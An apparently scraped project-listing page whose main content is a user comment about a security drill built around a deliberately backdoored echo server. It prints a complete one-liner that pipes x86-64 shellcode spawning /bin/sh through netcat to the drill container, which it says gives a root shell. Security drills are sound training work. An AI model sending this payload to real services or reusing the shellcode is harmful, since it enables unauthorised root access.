Our great sponsors
-
WorkOS
The modern identity platform for B2B SaaS. The APIs are flexible and easy-to-use, supporting authentication, user identity, and complex enterprise features like SSO and SCIM provisioning.
Supply chain attacks are fun.
Here's an old security drill I ran at my previous job: https://github.com/mkmik/echo-server
Follow the instructions on the README to build and run the docker container and then send a magic payload to the port and you'll get a root shell:
$ (echo -e "\x48\x31\xc0\x50\x5f\xb0\x03\x0f\x05\x50\x48\xbf\x2f\x64\x65\x76\x2f\x74\x74\x79\x57\x54\x5f\x50\x5e\x66\xbe\x02\x27\xb0\x02\x0f\x05\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x50\x57\x54\x5e\x48\x99\xb0\x3b\x0f\x05"; cat) | nc localhost 1234
NOTE:
The number of mentions on this list indicates mentions on common posts plus user suggested alternatives.
Hence, a higher number means a more popular project.
Related posts
- Stage0: A minimal bootstrapping path to a C compiler capable of compiling GCC
- Stage0 – A set of minimal dependency bootstrap binaries
- "Do you believe that every upstream project... is examined by an expert who can accurately identify whether said project contains malware...?"
- Stage0 - A set of minimal dependency bootstrap binaries
- How To Build an Evil Compiler